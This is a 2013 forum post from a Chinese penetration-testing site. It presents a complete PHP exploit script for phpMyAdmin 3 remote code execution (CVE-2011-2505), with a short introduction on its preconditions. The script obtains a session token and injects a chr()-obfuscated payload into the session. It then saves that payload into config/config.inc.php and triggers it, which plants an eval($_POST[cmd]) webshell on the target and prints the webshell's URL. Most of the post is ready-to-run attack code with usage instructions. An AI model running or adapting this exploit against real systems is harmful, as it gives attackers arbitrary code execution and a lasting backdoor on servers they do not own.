中国网络渗透测试联盟

Title: phpadmin3 remote code execute php version exploit

Author: admin    Time: 2013-2-21 09:13
Title: phpadmin3 remote code execute php version exploit
I've been a full-time stay-at-home dad lately, out of the loop on the scene for many months, and the blog hasn't been updated either.

Last night I was up all night with the kid and saw 黑哥's discussion of the phpmyadmin3 vulnerability in the php security group. I hadn't looked at the vulnerable code before, but I had seen wofeiwo's exp on Weibo a while back, and according to 黑哥 there is a way to exploit it that isn't "jilei" (chicken ribs, i.e. not worth the trouble). So that night I dug out the code, studied it, and wrote this warmed-over exp. Since I got to it late and plenty of people had already researched it and written exps, mine is just reheating leftovers; treat it as research to pass the time.

First, props to wofeiwo's python version of the exp, and props to wofeiwo and superhei for their diligence in digging in, role models to learn from. That earlier exp, though, had some limitations in practice:
One is that it requires session.auto_start = 1;
Two is that in the default pma3 code the libraries directory is already protected by .htaccess and cannot be accessed.
And then there is a third point, a gap nobody can get across: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really doesn't have to be that "jilei".

So I wrote this php version of the exp; the code follows:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2]; // must end with "/", e.g. /pma/

/**
 * Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
// any "404" in the raw response (status line included) is taken as "missing"
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// session id comes from the Set-Cookie header, token from the page links
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
if($token && $sessionid){
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
}else{
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
// the chr() chain decodes to: fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
// saving the setup page writes the poisoned session into config/config.inc.php
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
// requesting the generated config runs the payload, which writes a.php and echoes "t00ls"
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

// minimal raw HTTP client: GET when $data is empty, POST otherwise; returns the full response
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host; die;
    }
    fputs($fp, $packet);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2